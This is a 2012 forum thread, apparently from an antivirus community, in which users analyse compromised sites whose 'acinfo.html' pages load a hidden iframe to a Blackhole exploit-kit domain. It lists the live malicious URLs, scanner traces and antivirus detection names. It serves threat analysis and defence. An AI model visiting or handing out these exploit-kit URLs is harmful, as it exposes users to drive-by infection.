To Website Analyst: Rise of the Malicious "acinfo.html"

Donovan · July 6, 2012, 6:16pm

6 malicious acinfo.html sites were found 2012-07-06 08:31:51. Lets look at them together.

Site A (Host: humanas.rs):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

First thing, we get:
hotspotboutique.net/main.php?page=f00fe909ad13ba45
b[/b] hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=humanas.rs/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

The homepage looks regular, but when we check the “acinfo.html”, we get:
humanas.rs/acinfo.html
[decodingLevel=0] found JavaScript
DecodedIframe detected
[var s] URL=humanas.rs/ if
[var newurl] URL=humanas.rs/ if
[iframe] hotspotboutique.net/main.php?page=f00fe909ad13ba45
[decodingLevel=1] found JavaScript

We also get the phish title “NACHA - The Electronic Payments Association -” mentioned here (another acinfo.html site explained here). This site also has the same algorithm given in the above link. This provides evidence that the use of this specific algorithm and this phish title will be used in the future.

Site B (Host: ykwh.gov.cn):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

Here, we get the same intro as Site A, assuming a partnership with the domains:
hotspotboutique.net/main.php?page=f00fe909ad13ba45
b[/b] hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=ykwh.gov.cn/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

Several SWF files are also present. Results: top.swf | flash2.swf | focus1.swf

The main threat, “acinfo.html”, looks exactly like Site A.
ykwh.gov.cn/acinfo.html
[decodingLevel=0] found JavaScript
DecodedIframe detected
[var s] URL=ykwh.gov.cn/ if
[var newurl] URL=ykwh.gov.cn/ if
[iframe] hotspotboutique.net/main.php?page=f00fe909ad13ba45
[decodingLevel=1] found JavaScript

Site C (Host: spbfencing.ru) -Taken Down-:
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

404 from wplus.net. Appears the site was found malicious and taken down.

Site D (Host: wk999.com.cn) -???-:
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

The only thing happening on this page is a redirect to “/acinfo/” using the window.location method. Nothing suspect in the redirected page. Moving along…

Site E (Host: blog.cd3d.com.cn):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

hotspotboutique.net/main.php?page=f00fe909ad13ba45
b[/b] hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=blog.cd3d.com.cn/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

Same iframe, same phish title, and same algorithm from Site A and B. Now we know we have something.

Site F (Host: apps.org.rs):
URLQuery | VirusTotal | Zulu Scanner | Sucuri SiteCheck | URLVoid

hotspotboutique.net/main.php?page=f00fe909ad13ba45
b[/b] hotspotboutique.net/main.php?page=f00fe909ad13ba45
(referer=apps.org.rs/acinfo.html)failure: <urlopen error [Errno -2] Name or service not known>

Same algorithm as all above.

=================================

So in summary, the “acinfo.html” sites appear to call the known blackhole exploit hotspot “hotspotboutique.net”. This filename should be considered suspicious.

~!Donovan

polonus · July 6, 2012, 7:38pm

Hi !Donovan,

Realtime check reveals that hotspotboutique dot net is being blocked as seen by mob view resourches…
2012/07/06_06:07 hotspotboutique dot net/main.php?page=f00fe909ad13ba45 109.164.221.176 cust.static.109-164-221-176.swisscomdata dot ch. Blackhole exploit kit Registrant ironeggmanATyahoo.com 44038 as on Malware Domain List
Mind the marked as malcious script on here: http://urlquery.net/report.php?id=83575
But GoogleSafebrowsing has also been alerted for this as we can see here: http://www.google.com/safebrowsing/diagnostic?site=http://hotspotboutique.net/main.php?page=f00fe909ad13ba45
and I get this with WebBug a 11004 [11004] Valid name, no data record (check DNS setup),
because my avast Web Shield neatly blocks this malcious site or file as JS:Blackhole-X[Trj]
Conclusion we have detection from the avast shields. We are being protected!

polonus

Donovan · July 13, 2012, 1:41pm

A new one today. See: http://urlquery.net/report.php?id=89577
Many antiviruses now detect this threat, including avast!
https://www.virustotal.com/file/f4a890f6cbca08ea737e16098a9e60610dc3b41a4a88f2d3b9d5630a904889b7/analysis/

Pondus · July 13, 2012, 1:52pm

at virustotal only Fortinet

Sucuri
http://sitecheck.sucuri.net/results/projekt.mops.lodz.pl

Zulu analyzer
http://zulu.zscaler.com/submission/show/37e4289b823d965f9df3a4be0c03dd4a-1342187446

Pondus · July 13, 2012, 1:58pm

hmm…the VT result i get comes up with wrong scan date ?

on jotti
http://virusscan.jotti.org/en/scanresult/f92a823d37b47f3d9abeec9368fefad83d9a5ce9

Donovan · July 13, 2012, 2:06pm

Hi Pondus,

I get:


AntiVir		JS/BlacoleRef.BS 
Avast		JS:Blacole-X [Trj] 
BitDefender	Trojan.JS.Iframe.BOT
Commtouch	JS/IFrame.QY.gen
DrWeb		Exploit.BlackHole.12
Emsisoft	Trojan.JS.Blacole!IK
F-Prot		JS/IFrame.QY.gen
F-Secure	Trojan.JS.Iframe.BOT
Fortinet	JS/Iframe.W!tr
GData		Trojan.JS.Iframe.BOT
Ikarus		Trojan.JS.Blacole
McAfee		JS/Exploit-Blacole.ek
Microsoft	Trojan:JS/BlacoleRef.BS
Norman		JS/Blacole.GL
nProtect	Trojan.JS.Iframe.BOT
Sophos		Troj/ExpJs-CI 
TrendMicro	TROJ_GEN.RFFH1G9

Pondus · July 13, 2012, 2:11pm

cliking on your VT link i now get correct scan date…and 18/42 result
guess it was a hickup at VT

polonus · July 13, 2012, 3:06pm

Googling for acinfo.html you get many results for this particular malware campaign
Just some examples:
http://urlquery.net/report.php?id=83207
http://urlquery.net/report.php?id=84601
http://urlquery.net/report.php?id=89577
sucuri detects it here: http://sitecheck.sucuri.net/results/apps.org.rs/acinfo.html
and scumware here: 2012-07-09 15:08:53 htxp://garmonia-milk.ru/acinfo.html DF0D2D9BBD03FFB76C798E35B5C5C1F7 195.131.162.2 RU Trojan.JS.Iframe.BOT

polonus

Donovan · July 13, 2012, 3:16pm

3 More Here:
http://urlquery.net/report.php?id=89664
http://urlquery.net/report.php?id=89666
http://urlquery.net/report.php?id=89668

All use different IPs. Is it possible for one vendor to use multiple IPs?

polonus · July 13, 2012, 3:32pm

Hi !Donovan,

Normally there is no legit issue but this should not be performed at the same time having duplicate content on various IP. Only if your updating content while a searchengine is spidering it at the other server you may have created an issue. You only have to find a very cooperative dedicated host and cybercriminals often do meet these friendly forces or rather lenient ones…
So we actively have to monitor the availability of each server. This whole exercise with malware is called malware migration, and on VirusWatch you can follow these migration patterns on a daily basis, plus malware that is being taken down, often by consent of the malcreants who move their circus elsewhere to open up shop and carry on.
Sometimesthe malware is being closed or no longer responsive. Sometimes new versions are being launched from one domain in an ever changing sequence through ever changing url addresses and file names spewing the same malcreations or unique variantions on the same theme.
With urlquery dot net IDS alerts it is striking that over time you see various IP number for the same domain name, sometimes with 1 or more alerts, sometimes without one,

polonus

polonus · July 13, 2012, 5:29pm

Hi !Donovan,

Interesting webmaster’s discussion on this particular malware:
http://stackoverflow.com/questions/11414694/typo3-function-generates-trojan-js-blacoleref-bs-every-time-new
reply there from maholtz on question from testing
For detection scores see JS/BlacoleRef.BS at VW
here just 2

polonus

Donovan · July 22, 2012, 2:49pm

Here we have another: http://urlquery.net/report.php?id=99344

Still alive after 5+ days.

19/42 antiviruses now detect the contents of these malicious acinfo.html pages. See:
https://www.virustotal.com/file/f4a890f6cbca08ea737e16098a9e60610dc3b41a4a88f2d3b9d5630a904889b7/analysis/
Eh… the above is outdated, so lets hope more detect ATM

polonus · July 22, 2012, 3:16pm

Hi !Donovan,

Is this code in the attached image the malcode you refer to?
Get a live response from dungtank github for this url,

polonus

Donovan · July 22, 2012, 3:36pm

Yeah,

If you look closely you notice eval.

polonus · July 22, 2012, 4:16pm

Hi !Donovan,

Again going to htxp://hotspotboutique.net/main.php. Good thing about it is that we have avast Webshield detection for it as JS;Blackole-X[Trj].
So we have protection,

polonus

polonus · July 22, 2012, 7:23pm

This one has already been closed: http://www.google.com/safebrowsing/diagnostic?site=winners.co.rs/acinfo.html

The requested URL /acinfo.html was not found on this server.
Additionally, a 403 Forbidden
error was encountered while trying to use an ErrorDocument to handle the request.
See on trojan Cidrix: http://cbnetsecurity.com/colors/archives/825 (link author cristian on Eye on Spam)
Do a look-up there and you will see the IP for the malware is undef for the mdl_trojan Cridex senderbase,
contributor was malware domain list
Malicious software consitst of 213 trojans, 15 scripting exploits, 7 exploits.

Site us being hosted on 3 networks, e.g.: AS17772 (CHINACOM), AS44038 (BLUEWIN), AS20860 (IOMART).

polonus

To Website Analyst: Rise of the Malicious "acinfo.html"

Announcements